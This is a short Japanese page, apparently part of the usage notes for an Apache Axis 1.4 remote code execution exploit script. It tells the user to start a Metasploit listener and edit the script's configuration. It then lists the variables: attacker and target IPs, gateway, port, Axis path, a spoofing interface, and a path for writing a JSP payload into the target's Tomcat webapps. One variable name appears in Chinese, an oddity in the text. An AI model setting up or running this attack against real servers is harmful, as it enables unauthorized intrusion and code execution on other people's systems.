
apache axis1.4リモートコード実行脆弱性
Apache Axis 1.4 リモートコード実行脆弱性 ローカルマシンでmsfのリスナーを設定する必要があります。また、コードの24〜30行目を変更する必要があります。
#これらの変数を自分の設定に合わせて変更する必要があります myip = “ 192.168.0.117 ” #ローカルマシンのIP target = “ 192.168.0.102 ” #ターゲットIP 网关= “ 192.168.0.1 ” #デフォルトゲートウェイ targetport = “ 8080 ” #ターゲットがAxisを実行しているポート(おそらく8080) pathtoaxis = “ http://192.168.0.102:8080/axis ” #カスタムのAxisインストールパスに変更可能ですが、これがデフォルトです spoofinterface = “ eth0 ” #偽装インターフェース jspwritepath = “ webapps \ axis \ exploit.jsp ” #ターゲットにJSPペイロードを書き込む相対パス。これはTomcatインストールのデフォルトパスです